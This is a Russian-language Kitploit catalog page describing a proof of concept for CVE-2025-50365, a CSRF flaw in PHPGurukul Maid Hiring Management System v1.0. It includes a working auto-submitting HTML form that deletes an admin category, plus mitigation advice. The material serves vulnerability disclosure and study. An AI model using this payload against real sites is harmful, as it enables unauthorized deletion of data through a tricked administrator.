Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — PoC для CVE-2025-50365: CSRF-уязвимость в PHPGurukul Maid Hiring Management System, позволяющая удаление категорий найма через специально созданный запрос администратора. | Kitploit
Инструменты/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

PoC для CVE-2025-50365: CSRF-уязвимость в PHPGurukul Maid Hiring Management System, позволяющая удаление категорий найма через специально созданный запрос администратора.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название проекта и URL репозитория: Система управления наймом горничных на PHP и MySQL

Тип уязвимости: Подделка запроса на стороне клиента (Client Side Request Forgery)

Затронутая(ые) версия(и): v1.0

💣Описание уязвимости: Уязвимость межсайтовой подделки запроса (CSRF) существует в панели администратора PHPGurukul Hiring Management System, что позволяет злоумышленнику удалять произвольные категории найма, обманом заставляя аутентифицированного администратора посетить вредоносный сайт. Это может привести к удалению данных и несанкционированным изменениям на уровне администратора.

👩‍💻Воздействие: Несанкционированное удаление категорий.

🛜Доказательство концепции (PoC):

  1. Существовал функционал удаления категорий, доступный только аутентифицированному администратору. 1
  2. HTML-код для отправки GET-запроса к конечной точке /admin/manage-category.php CSRF-POC
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/manage-category.php">
      <input type="hidden" name="delid" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Используйте HTML-код и создайте вредоносный URL. 3
  • После того как администратор перейдет по ссылке, категория будет удалена. 4 5
  • Рекомендация: Внедрение CSRF-токенов в формы администратора, применение файлов cookie с атрибутом SameSite и проверка источника запроса для предотвращения несанкционированных действий.

    Скачать инструмент